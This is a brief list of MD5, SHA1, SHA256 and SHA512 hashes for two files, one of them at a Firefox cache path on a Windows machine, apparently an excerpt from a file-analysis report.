MD5 3a4acc177b131048e0f51af18db3c6c2
SHA1 80f1bcce620c1149f8bcefbd5bafc7e75363ccd8
SHA256 fc651c95089d9b82a6d11cbe7731fb60e3d0d78f14b08763eaf66f6dbb501794
SHA512 d440de31f143cd409cf9b04bcadd0df1d71e5182103e751874a066b1a8783eb4e11755cd8d3afe493ef234a96d169217930bf2f6340d5f724275a1122d3bc079

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\cache2\entries\F2B6EDD72A6ECFBFCB5C32C41B2471664907DB38

MD5 f1fdac506de12bb4cbf9330910ece4d7
SHA1 2575bcd1068f3d9b71b70df77f43ae109daf4b6c
SHA256 073cd9b6df38d8d9affd1f1cc11b3020fd762e3d6736e02ed0e416ef71753585
SHA512 8fe7703a82ca71a6307d9d033bebadabfe40c84d86d63debbf8218b27a50c072d6b54bf2628199cf3f42646540026832947baf94fbe2680773c6e5633aa17f70